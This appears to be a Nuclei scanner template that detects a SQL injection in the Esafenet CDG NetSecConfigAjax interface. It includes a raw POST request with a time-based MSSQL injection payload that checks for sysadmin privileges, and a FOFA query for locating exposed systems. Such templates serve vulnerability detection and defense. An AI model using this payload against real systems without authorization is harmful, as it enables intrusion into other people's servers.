nuclei-templates/http/vulnerabilities/esafenet/esafenet-netsecconfigajax-s...

35 lines
1.4 KiB
YAML

id: esafenet-netsecconfigajax-sqli
info:
name: Esafenet CDG NetSecConfigAjax - Sql Injection
author: adeljck
severity: high
description: |
The `state` parameter of the `NetSecConfigAjax` interface of the Yisaitong electronic document security management system does not pre-compile and adequately verify the incoming data, resulting in a SQL injection vulnerability in the interface. Malicious attackers may obtain the server through this vulnerability information or directly obtain server permissions.
classification:
cpe: cpe:2.3:a:esafenet:cdg:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: esafenet
product: cdg
fofa-query: title="电子文档安全管理系统",body="CDGServer3/"
tags: esafenet,sqli
http:
- raw:
- |
POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
command=updateNetSec&state=123';if (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--
matchers:
- type: dsl
dsl:
- 'contains(content_type,"text/html")'
- 'contains(body,"操作成功")'
- 'status_code == 200'
condition: and
# digest: 4b0a00483046022100f4fcece13b3fd0a64f68ab603dcad693b7c588438b022099f31667505ab3e6c0022100dd7f497e139a1f30cfdf66d92e5163587f9f72bdccf2b14d5e7d804ff5becda0:922c64590222798bb761d5b6d8e72950